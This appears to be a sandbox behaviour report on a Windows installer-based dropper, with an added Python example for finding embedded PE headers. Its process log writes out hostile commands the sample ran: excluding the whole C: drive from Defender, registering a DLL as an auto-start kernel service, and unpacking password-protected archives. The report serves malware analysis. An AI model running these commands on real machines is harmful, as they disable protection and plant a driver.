Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.dr | String found in binary or memory: http://ocsp.digicert.com0I
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.dr | String found in binary or memory: http://ocsp.digicert.com0X
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.dr | String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: cVyexkZjrG.exe | String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: cVyexkZjrG.exe, 00000000.00000003.2052689369.00000000029B0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.exe, 00000000.00000003.2053082904.000000007F74B000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000002.00000000.2054654528.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, cVyexkZjrG.tmp, 00000007.00000000.2144559370.000000000033D000.00000020.00000001.01000000.00000008.sdmp, cVyexkZjrG.tmp.6.dr, cVyexkZjrG.tmp.0.dr | String found in binary or memory: https://www.innosetup.com/
Source: cVyexkZjrG.exe, 00000000.00000003.2052689369.00000000029B0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.exe, 00000000.00000003.2053082904.000000007F74B000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000002.00000000.2054654528.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, cVyexkZjrG.tmp, 00000007.00000000.2144559370.000000000033D000.00000020.00000001.01000000.00000008.sdmp, cVyexkZjrG.tmp.6.dr, cVyexkZjrG.tmp.0.dr | String found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpProcess information set: 01 00 00 00 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CAD3886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6CAD3886
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC55120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,7_2_6CC55120
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CAD3C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6CAD3C62
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC55D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,7_2_6CC55D60
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CAD3D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6CAD3D18
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CAD3D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6CAD3D62
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CAD39CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6CAD39CF
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CAD3A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6CAD3A6A
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CAD1950: CreateFileA,DeviceIoControl,CloseHandle,7_2_6CAD1950
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CAD4754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,7_2_6CAD4754
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp | Code functions (73 entries, all 7_2_*): 6CAD4754, 6CAE4A27, 6CC51880, 6CC56A43, 6CCB6CE0, 6CD24DE0, 6CD06D10, 6CCA2EC9, 6CD0EEF0, 6CCDAEEF, 6CC88EA1, 6CD1C8D0, 6CCD4896, 6CD24870, 6CCFE810, 6CD16820, 6CD26999, 6CD18950, 6CC88972, 6CD2A91A, 6CD06900, 6CD1A930, 6CD14AA0, 6CCE0A52, 6CD2AA00, 6CC90BCA, 6CD1EBC0, 6CCFAB90, 6CCA0B66, 6CD0E4D0, 6CD14489, 6CCE84AC, 6CD045D0, 6CD0C580, 6CD02580, 6CCF2521, 6CD18520, 6CD246C0, 6CD1E600, 6CC8C7CF, 6CD267C0, 6CCEC7F3, 6CD167A0, 6CD0E0E0, 6CD00020, 6CD1C2A0, 6CD18200, 6CD25D90, 6CD03D50, 6CCD7D43, 6CD09E80, 6CCE1F11, 6CD178C8, 6CCF589F, 6CD099F0, 6CCFDAD0, 6CD01AA0, 6CCFFA50, 6CCA540A, 6CD0F5C0, 6CCCF5EC, 6CD096E0, 6CD1F640, 6CCFB650, 6CD237C0, 6CD29700, 6CCA3092, 6CD0F050, 6CD071F0, 6CD0D280, 6CD0D380, 6CD16AF0, 6CD13750
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code functions (69 entries, all 10_2_*): 00B781EC, 00BB81C0, 00BA4250, 00BC8240, 00BCC3C0, 00BC04C8, 00BA8650, 00BAC950, 00B80943, 00BA8C20, 00BC4EA0, 00BC0E00, 00B910AC, 00BBD089, 00BB5180, 00BAD1D0, 00BC91C0, 00BC1120, 00BCD2C0, 00B953F3, 00B353CF, 00B7D496, 00BC54D0, 00BCD470, 00B31572, 00BC1550, 00BBD6A0, 00B89652, 00B397CA, 00B49766, 00BCD9E0, 00B31AA1, 00BB5E80, 00BB5F80, 00B4E00A, 00BB22E0, 00BD2300, 00B9E49F, 00BB25F0, 00BAA6A0, 00BA66D0, 00BCE990, 00BB2A80, 00B8AB11, 00BB6CE0, 00BB70D0, 00BAB180, 00B9B121, 00BC7200, 00BBF3A0, 00B5B3E4, 00BCF3C0, 00BBF420, 00BA7410, 00BCF599, 00BC3530, 00BD351A, 00BAF500, 00BD3601, 00BA3790, 00BC77C0, 00B5F8E0, 00BAF910, 00BB7AF0, 00B83AEF, 00B4BAC9, 00B4BC92, 00BB7C50, 00BAFDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp | Code function: String function: 6CC89240 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp | Code function: String function: 6CD26F10 appears 728 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00BCFB10 appears 723 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00B31E40 appears 171 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00B328E3 appears 34 times
Source: cVyexkZjrG.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: cVyexkZjrG.tmp.6.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: cVyexkZjrG.tmp.0.dr | Static PE information: Number of sections : 11 > 10
Source: cVyexkZjrG.tmp.6.dr | Static PE information: Number of sections : 11 > 10
Source: cVyexkZjrG.exe | Static PE information: Number of sections : 11 > 10
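The two static findings above (an RT_RCDATA resource that is itself a PE32+ console executable for x86-64, and installer images with 11 sections, above the usual limit of 10) are the kind of thing a triage script can recover from any blob without a full PE library: look for "MZ", follow e_lfanew to "PE\0\0", and read the COFF and optional headers. The Python below is an added example written for this page, not code from the sample or from Joe Sandbox. It scans a byte buffer for embedded PE images, reports Machine, NumberOfSections, the optional-header Magic (PE32 vs PE32+) and Subsystem, and flags images with more than 10 sections. Because the sample's resource data is not on this page, the container it scans is constructed inline: a decoy "MZ" with no valid e_lfanew, then a synthetic PE32+ header built by `build_synthetic_pe32plus` (a helper that exists only for this example).

```python
"""Added example: carve embedded PE headers out of an arbitrary byte buffer.

Not part of the sample or of Joe Sandbox; the fixture below is constructed."""
import struct

MACHINES = {0x014C: "i386", 0x01C0: "ARM", 0x8664: "x86-64", 0xAA64: "ARM64"}
SUBSYSTEMS = {1: "native", 2: "Windows GUI", 3: "Windows console"}
# COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
# NumberOfSymbols, SizeOfOptionalHeader, Characteristics
COFF_FMT = "<HHIIIHH"


def build_synthetic_pe32plus(num_sections=11, subsystem=3):
    """Constructed fixture: a bare PE32+ header (DOS header, COFF header,
    optional header) with no sections or code. It is not a runnable program."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Characteristics 0x0022 = EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE
    coff = struct.pack(COFF_FMT, 0x8664, num_sections, 0, 0, 0, 240, 0x0022)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)       # Magic: PE32+
    struct.pack_into("<H", opt, 68, subsystem)  # Subsystem sits at +68 in both PE32 and PE32+
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


def _parse_pe_at(buf, pos, max_sections):
    """Validate an 'MZ' hit at pos and summarize its headers, or return None."""
    if pos + 0x40 > len(buf):
        return None
    e_lfanew = struct.unpack_from("<I", buf, pos + 0x3C)[0]
    pe = pos + e_lfanew
    # e_lfanew must point past the DOS header, stay in the buffer and land on "PE\0\0".
    if not 0x40 <= e_lfanew <= 0x1000 or pe + 24 > len(buf) or buf[pe:pe + 4] != b"PE\0\0":
        return None
    machine, nsect, _, _, _, opt_size, chars = struct.unpack_from(COFF_FMT, buf, pe + 4)
    opt = pe + 24
    if opt_size < 70 or opt + 70 > len(buf):
        return None
    magic = struct.unpack_from("<H", buf, opt)[0]
    subsystem = struct.unpack_from("<H", buf, opt + 68)[0]
    info = {
        "offset": pos,
        "format": {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, "unknown"),
        "machine": MACHINES.get(machine, hex(machine)),
        "sections": nsect,
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "executable": bool(chars & 0x0002),  # IMAGE_FILE_EXECUTABLE_IMAGE
        "dll": bool(chars & 0x2000),         # IMAGE_FILE_DLL
        "header_size": e_lfanew + 24 + opt_size,
    }
    if nsect > max_sections:
        info["note"] = f"more than {max_sections} sections"
    return info


def find_embedded_pe(buf, max_sections=10):
    """Return a summary dict for every valid PE header found in buf."""
    found = []
    pos = buf.find(b"MZ")
    while pos != -1:
        info = _parse_pe_at(buf, pos, max_sections)
        if info is None:
            pos = buf.find(b"MZ", pos + 2)
            continue
        found.append(info)
        pos = buf.find(b"MZ", pos + info["header_size"])
    return found


# Constructed container: a decoy "MZ" whose e_lfanew is zero, padding,
# the synthetic PE32+ header at offset 300, then trailing junk.
SAMPLE_CONTAINER = b"MZ" + b"\x00" * 298 + build_synthetic_pe32plus() + b"\xff" * 50

if __name__ == "__main__":
    for hit in find_embedded_pe(SAMPLE_CONTAINER):
        print(hit)
```

Run against a dropper or its extracted resources, the same scan lists every embedded image with its architecture and subsystem; the decoy "MZ" in the fixture is there to show that the e_lfanew check, not the two-byte signature, is what qualifies a hit.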
Source: cVyexkZjrG.exe, 00000000.00000000.2050922147.0000000000639000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameklO2bH6zRBJ6nSx.exe vs cVyexkZjrG.exe
Source: cVyexkZjrG.exe, 00000000.00000003.2053082904.000000007FA4A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameklO2bH6zRBJ6nSx.exe vs cVyexkZjrG.exe
Source: cVyexkZjrG.exe, 00000000.00000003.2052689369.0000000002ACE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameklO2bH6zRBJ6nSx.exe vs cVyexkZjrG.exe
Source: cVyexkZjrG.exe | Binary or memory string: OriginalFileNameklO2bH6zRBJ6nSx.exe vs cVyexkZjrG.exe
Source: cVyexkZjrG.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.13.dr | Binary string: \Device\TfSysMon
Source: tProtect.dll.13.dr | Binary string: \Device\TfKbMonPWLCache
Source: classification engine | Classification label: mal88.evad.winEXE@135/33@0/0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp | Code function: 7_2_6CC55D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00B39313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00B43D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00B39252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp | Code function: 7_2_6CC55240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp | File created: C:\Program Files (x86)\Windows NT\is-140D4.tmp
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:<PID>:120:WilError_03 for PIDs 1276, 6536, 5960, 1372, 6564, 6020, 3380, 6716, 1784, 5296, 6580, 5460, 5308, 7132, 2200, 3964, 4476; and \Sessions\1\BaseNamedObjects\Local\SM0:1576:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:<PID>:120:WilError_03 for PIDs 5912, 5908, 1268, 5488, 2284, 3752, 6576, 6660, 6672, 3668, 2164, 768, 7056; and \Sessions\1\BaseNamedObjects\Local\SM0:<PID>:120:WilError_03 for PIDs 1896, 6488
Source: C:\Users\user\Desktop\cVyexkZjrG.exe | File created: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp
Source: C:\Users\user\Desktop\cVyexkZjrG.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (twice)
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (twice)
Source: C:\Users\user\Desktop\cVyexkZjrG.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (twice)
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (twice)
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\cVyexkZjrG.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: cVyexkZjrG.exe | Virustotal: Detection: 8%
Source: cVyexkZjrG.exe | String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\cVyexkZjrG.exe | File read: C:\Users\user\Desktop\cVyexkZjrG.exe
Source: unknown | Process created: C:\Users\user\Desktop\cVyexkZjrG.exe "C:\Users\user\Desktop\cVyexkZjrG.exe"
Source: C:\Users\user\Desktop\cVyexkZjrG.exe | Process created: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp "C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp" /SL5="$20428,6416153,845824,C:\Users\user\Desktop\cVyexkZjrG.exe"
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp | Process created: C:\Users\user\Desktop\cVyexkZjrG.exe "C:\Users\user\Desktop\cVyexkZjrG.exe" /VERYSILENT
Source: C:\Users\user\Desktop\cVyexkZjrG.exe | Process created: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp "C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp" /SL5="$40436,6416153,845824,C:\Users\user\Desktop\cVyexkZjrG.exe" /VERYSILENT
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\cVyexkZjrG.exeProcess created: C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp "C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp" /SL5="$20428,6416153,845824,C:\Users\user\Desktop\cVyexkZjrG.exe" Jump to behavior
